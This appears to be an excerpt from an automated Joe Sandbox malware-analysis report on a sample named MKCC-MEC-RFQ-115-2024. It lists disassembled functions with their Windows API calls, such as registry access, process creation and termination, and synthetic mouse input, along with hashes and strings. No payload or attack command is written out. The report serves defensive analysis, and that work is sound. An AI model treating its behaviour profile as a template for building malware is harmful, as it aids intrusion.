                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
                                              • Instruction ID: cd867f58f1eaf8fbaf9dc49321fbdfea6c8dad16acfce99c790b010f08b19c22
                                              • Opcode Fuzzy Hash: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
                                              • Instruction Fuzzy Hash: 1E61EF3050029AAFCF15EF65CC82EFE37A5AF49308F044519F9996B2A3DB74AC45CB91
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 001610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160548
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00160588
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001605AB
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001605D4
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00160617
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00160624
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: cf5ab36a556fed1c8fd14bb4fbe0b9b62422d361836fa146a22c8c886680b71d
                                              • Instruction ID: 83ef4312c8d3966dd2c3ca6c409aa70ab8be091117d67cca27ecb60b4a8d7ba4
                                              • Opcode Fuzzy Hash: cf5ab36a556fed1c8fd14bb4fbe0b9b62422d361836fa146a22c8c886680b71d
                                              • Instruction Fuzzy Hash: 52516931108240AFC715EB24DC85EAFBBE9FF88314F04892DF586972A2DB71E915CB52
                                              APIs
                                              • GetMenu.USER32(?), ref: 00165A82
                                              • GetMenuItemCount.USER32(00000000), ref: 00165AB9
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00165AE1
                                              • GetMenuItemID.USER32(?,?), ref: 00165B50
                                              • GetSubMenu.USER32(?,?), ref: 00165B5E
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00165BAF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: 05d70c91fda4d19b2268536d499a2922cbe59b20bd90af9b47770f40188b625c
                                              • Instruction ID: 2b0d7725b374dc6b072e6be7fb7eab498bb12867c88184a2c2dc27f188c66cc4
                                              • Opcode Fuzzy Hash: 05d70c91fda4d19b2268536d499a2922cbe59b20bd90af9b47770f40188b625c
                                              • Instruction Fuzzy Hash: 87518E35A00615AFDF15EFA4CC45AAEB7B6EF48310F154469F852BB351CB70AE418B90
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 0013F3F7
                                              • VariantClear.OLEAUT32(00000013), ref: 0013F469
                                              • VariantClear.OLEAUT32(00000000), ref: 0013F4C4
                                              • _memmove.LIBCMT ref: 0013F4EE
                                              • VariantClear.OLEAUT32(?), ref: 0013F53B
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0013F569
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: 681dbc17cc4fc8f026c2133f5feac670206f27704a80629d7caaf1254dd07ee5
                                              • Instruction ID: 1b6466f5f58407e794eebcbb9bacbd000b54bc9fd30cb4c8f1babd98f7a6454c
                                              • Opcode Fuzzy Hash: 681dbc17cc4fc8f026c2133f5feac670206f27704a80629d7caaf1254dd07ee5
                                              • Instruction Fuzzy Hash: 665136B5A00209AFCB14CF58D884AAAB7B8FF4C354F15856EE959DB311D730E952CFA0
                                              APIs
                                              • _memset.LIBCMT ref: 00142747
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00142792
                                              • IsMenu.USER32(00000000), ref: 001427B2
                                              • CreatePopupMenu.USER32 ref: 001427E6
                                              • GetMenuItemCount.USER32(000000FF), ref: 00142844
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00142875
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: ce134aae6f897d377062def623dba2b1cd73d27ca34d25062c51994916fa0784
                                              • Instruction ID: f8486d4ba8d1b28f51949c9fa464ba12509d6de3a84d19311f1d7db765d48a29
                                              • Opcode Fuzzy Hash: ce134aae6f897d377062def623dba2b1cd73d27ca34d25062c51994916fa0784
                                              • Instruction Fuzzy Hash: 7F51B270A0030AEFDF24CF68D888BAEBBF5BF55314F504169F8159B2A1D7B09985CB61
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 000E179A
                                              • GetWindowRect.USER32(?,?), ref: 000E17FE
                                              • ScreenToClient.USER32(?,?), ref: 000E181B
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000E182C
                                              • EndPaint.USER32(?,?), ref: 000E1876
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: 4ec62e20c6f2ec8fa6d97116241c72304c33aac6831d3c29f0a9e1f0a1d461df
                                              • Instruction ID: 20b90ed0fc36d89970392c27578646176c42ad2df6054c2ce188f4475938a7d2
                                              • Opcode Fuzzy Hash: 4ec62e20c6f2ec8fa6d97116241c72304c33aac6831d3c29f0a9e1f0a1d461df
                                              • Instruction Fuzzy Hash: 8141BD71104340AFC710DF25DC84BFA7BF8EB4A724F140628F9A5972A2CB719C85DB61
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00155134,?,?,00000000,00000001), ref: 001573BF
                                                • Part of subcall function 00153C94: GetWindowRect.USER32(?,?), ref: 00153CA7
                                              • GetDesktopWindow.USER32 ref: 001573E9
                                              • GetWindowRect.USER32(00000000), ref: 001573F0
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00157422
                                                • Part of subcall function 001454E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0014555E
                                              • GetCursorPos.USER32(?), ref: 0015744E
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001574AC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: 3f13eee5a08d28084602ef66494ce654d823cab131d5f3a05642d88e93983e2f
                                              • Instruction ID: 14d2178f75f7e807b83a864e919091393b0d56d94d512d404215d1ed74e17c71
                                              • Opcode Fuzzy Hash: 3f13eee5a08d28084602ef66494ce654d823cab131d5f3a05642d88e93983e2f
                                              • Instruction Fuzzy Hash: 9231D272508306ABD720DF14EC49E9BBBAAFF88314F000919F9999B191D770E949CB92
                                              APIs
                                                • Part of subcall function 001385F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00138608
                                                • Part of subcall function 001385F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00138612
                                                • Part of subcall function 001385F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00138621
                                                • Part of subcall function 001385F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00138628
                                                • Part of subcall function 001385F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0013863E
                                              • GetLengthSid.ADVAPI32(?,00000000,00138977), ref: 00138DAC
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00138DB8
                                              • HeapAlloc.KERNEL32(00000000), ref: 00138DBF
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00138DD8
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00138977), ref: 00138DEC
                                              • HeapFree.KERNEL32(00000000), ref: 00138DF3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              • Opcode ID: 737a59a955ed3ddcfc6eb0e6a917bdcd7f73c6830dba87c58f7a807531570aba
                                              • Instruction ID: 508cb8df8f272273ae3133d0aca4869d3abda8b52a771707b0e4acac56786132
                                              • Opcode Fuzzy Hash: 737a59a955ed3ddcfc6eb0e6a917bdcd7f73c6830dba87c58f7a807531570aba
                                              • Instruction Fuzzy Hash: 0411A932601605FFDB149FA4EC09BBE7BAAFF55355F10402DF84997290CB72AA85CB60
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00138B2A
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00138B31
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00138B40
                                              • CloseHandle.KERNEL32(00000004), ref: 00138B4B
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00138B7A
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00138B8E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              • Opcode ID: 1d3ec5110a5a5d8c4d965b0fe5c44e928bea0de7be2e330ef6602cdd843b9462
                                              • Instruction ID: 104bbb2e385b29433d7214296b712b723dc856548db53aa20107687112f248f8
                                              • Opcode Fuzzy Hash: 1d3ec5110a5a5d8c4d965b0fe5c44e928bea0de7be2e330ef6602cdd843b9462
                                              • Instruction Fuzzy Hash: C0112CB250124AEBDF018FA4ED49FDABBA9EF08304F144069FE04A2160C7759D61DB60
                                              APIs
                                                • Part of subcall function 000E12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E134D
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E135C
                                                • Part of subcall function 000E12F3: BeginPath.GDI32(?), ref: 000E1373
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E139C
                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0016C1C4
                                              • LineTo.GDI32(00000000,00000003,?), ref: 0016C1D8
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0016C1E6
                                              • LineTo.GDI32(00000000,00000000,?), ref: 0016C1F6
                                              • EndPath.GDI32(00000000), ref: 0016C206
                                              • StrokePath.GDI32(00000000), ref: 0016C216
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: c110c614d22803dccb1e491ce0590544defabff8b9e5dd2e6cf8f52eac181d22
                                              • Instruction ID: 174b30ea918bd284ffac02d4a17fa6fdb6efc2e8a651ee9ed0168fccf45d07fc
                                              • Opcode Fuzzy Hash: c110c614d22803dccb1e491ce0590544defabff8b9e5dd2e6cf8f52eac181d22
                                              • Instruction Fuzzy Hash: F811397600010CBFDB019F90EC88EEA3FADEB08390F048025FA085A5A1C7B19D95DBA0
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001003D3
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 001003DB
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001003E6
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001003F1
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 001003F9
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00100401
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: 5975cfe5fdd4c762cde47822ac4508facbe376f5c788049e6e7865bf2bb7015a
                                              • Instruction ID: f78dcae9c95ae687a62948103832cb9a2d08f81f986f39033c4e711687e7e991
                                              • Opcode Fuzzy Hash: 5975cfe5fdd4c762cde47822ac4508facbe376f5c788049e6e7865bf2bb7015a
                                              • Instruction Fuzzy Hash: 880148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7F5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0014569B
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001456B1
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 001456C0
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001456CF
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001456D9
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001456E0
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 9aa9ed27452185c9b2715dc2fad1e363271f282b430e0be28c254e3e471b1bef
                                              • Instruction ID: e73b20799316f45e482994edb6416fafdb378b4d7e81ef7729b20d6f0d002bbd
                                              • Opcode Fuzzy Hash: 9aa9ed27452185c9b2715dc2fad1e363271f282b430e0be28c254e3e471b1bef
                                              • Instruction Fuzzy Hash: E6F01D32241159BBE7215BA2EC0DEEB7A7CEBC6B51F00016DFA04D146197E11A42C6B5
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 001474E5
                                              • EnterCriticalSection.KERNEL32(?,?,000F1044,?,?), ref: 001474F6
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,000F1044,?,?), ref: 00147503
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,000F1044,?,?), ref: 00147510
                                                • Part of subcall function 00146ED7: CloseHandle.KERNEL32(00000000,?,0014751D,?,000F1044,?,?), ref: 00146EE1
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00147523
                                              • LeaveCriticalSection.KERNEL32(?,?,000F1044,?,?), ref: 0014752A
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: b6c2a340efa76c825a0c32072546c1fb44bd0199fbe06d78f93076170daeb2e8
                                              • Instruction ID: 77982e16d2294721a097924ce8c307575d7e3168ae061ce262f4b54ef53add5d
                                              • Opcode Fuzzy Hash: b6c2a340efa76c825a0c32072546c1fb44bd0199fbe06d78f93076170daeb2e8
                                              • Instruction Fuzzy Hash: 7CF05E3A144622EBDB112B64FC9C9EB772AFF45302F000539F202A58B0CBB59882CF50
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00138E7F
                                              • UnloadUserProfile.USERENV(?,?), ref: 00138E8B
                                              • CloseHandle.KERNEL32(?), ref: 00138E94
                                              • CloseHandle.KERNEL32(?), ref: 00138E9C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00138EA5
                                              • HeapFree.KERNEL32(00000000), ref: 00138EAC
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 1277a2fd68edd2933484d60be6eecbdfeaf18148bb6fdde2f88c71f25af31528
                                              • Instruction ID: a47c9b20cdbfe3607a4080c50a0155fab8a5f47ff637e7e507401a97d5fef2a7
                                              • Opcode Fuzzy Hash: 1277a2fd68edd2933484d60be6eecbdfeaf18148bb6fdde2f88c71f25af31528
                                              • Instruction Fuzzy Hash: CBE05276104505FBDA011FE5FC0C95ABB69FB8A762B508639F21981970CBB294A2DB50
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00158928
                                              • CharUpperBuffW.USER32(?,?), ref: 00158A37
                                              • VariantClear.OLEAUT32(?), ref: 00158BAF
                                                • Part of subcall function 00147804: VariantInit.OLEAUT32(00000000), ref: 00147844
                                                • Part of subcall function 00147804: VariantCopy.OLEAUT32(00000000,?), ref: 0014784D
                                                • Part of subcall function 00147804: VariantClear.OLEAUT32(00000000), ref: 00147859
                                              Strings
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: c4c611cf3ca88d68ef40d7944cbbfe43cb1c31d658b2c9ccf5c2bc76714be509
                                              • Instruction ID: da9b332a21a7e09577f25cfe7b660c146243f644b95d33e0579125ce4ab11121
                                              • Opcode Fuzzy Hash: c4c611cf3ca88d68ef40d7944cbbfe43cb1c31d658b2c9ccf5c2bc76714be509
                                              • Instruction Fuzzy Hash: E9919070608341DFC704DF29C48096ABBE4EFC8315F04496EF89A9B362DB30E949CB52
                                              APIs
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                              • _memset.LIBCMT ref: 00143077
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001430A6
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00143159
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00143187
                                              Strings
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: 8cfecc15f5e7ed1300a823cdf7385115830b6140e94f864bbc7fdc55a75a97e6
                                              • Instruction ID: ac9734628946515e9124907e263ded1f4cc3f3da2204f67ab730c477f8052d04
                                              • Opcode Fuzzy Hash: 8cfecc15f5e7ed1300a823cdf7385115830b6140e94f864bbc7fdc55a75a97e6
                                              • Instruction Fuzzy Hash: F151A0716083019ED7299F28D845A6BB7E8EF55B20F040A2EF8A5D31F1DB74CE44C792
                                              APIs
                                              • GetWindowRect.USER32(00F1EBE8,?), ref: 00169AD2
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00169B05
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00169B72
                                              Strings
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID: @U=u
                                              • API String ID: 3880355969-2594219639
                                              • Opcode ID: 2234064320d833577431b4dd05974b1c1efdc1eae7bf57c0c1437b5eb1e8d33c
                                              • Instruction ID: 628cdc024f74f30629863d6919f13b62354c2097a6b2829807659dc158e28728
                                              • Opcode Fuzzy Hash: 2234064320d833577431b4dd05974b1c1efdc1eae7bf57c0c1437b5eb1e8d33c
                                              • Instruction Fuzzy Hash: A7512C75A00209EFCF10DF68ED80DAE7BB9FB55360F148169F8259B2A0D770AD91CB90
                                              APIs
                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0013DAC5
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0013DAFB
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0013DB0C
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0013DB8E
                                              Strings
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: 7d8c2fb4939dd0fab5171207497461c1a763578efd93cefa8e4a2678fd629d31
                                              • Instruction ID: 201cbee5479742f043806de7a9bca6d2dd2523cb2c177969845d4213ed2833dd
                                              • Opcode Fuzzy Hash: 7d8c2fb4939dd0fab5171207497461c1a763578efd93cefa8e4a2678fd629d31
                                              • Instruction Fuzzy Hash: 394182B1600208EFDB15CF54E884A9ABBB9EF45350F1680ADED099F209D7B1DE44CBA0
                                              APIs
                                              • _memset.LIBCMT ref: 00142CAF
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00142CCB
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00142D11
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001A6890,00000000), ref: 00142D5A
                                              Strings
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: 6f5f4e846ab2a32c6ff984871544a4aa27674f8e73350bb0f82eedc44d3a302e
                                              • Instruction ID: 957779bb8dd0298148abeb05827f9fc14266b48267b74e3ab0e10897d0f05377
                                              • Opcode Fuzzy Hash: 6f5f4e846ab2a32c6ff984871544a4aa27674f8e73350bb0f82eedc44d3a302e
                                              • Instruction Fuzzy Hash: E241C0706043029FD724DF64CC85B5ABBE8EF85320F444A2EF966972E1D770E985CB92
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00168B4D
                                              Strings
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID: @U=u
                                              • API String ID: 634782764-2594219639
                                              • Opcode ID: f19aa1cd9b5bdc19a01214cfa62fa47694bdf482eab3f0435c1c6b22d5ef3dd0
                                              • Instruction ID: 62f99189c52150610a5c7fb63a8bfd621630564deee68d03eeaa41d84efc72a6
                                              • Opcode Fuzzy Hash: f19aa1cd9b5bdc19a01214cfa62fa47694bdf482eab3f0435c1c6b22d5ef3dd0
                                              • Instruction Fuzzy Hash: 2F31D4B4604204BFEF349F58DC99FA937A4EB0A310F284716FA51D72E1CF70A9A09B51
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0015DAD9
                                                • Part of subcall function 000E79AB: _memmove.LIBCMT ref: 000E79F9
                                              Strings
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
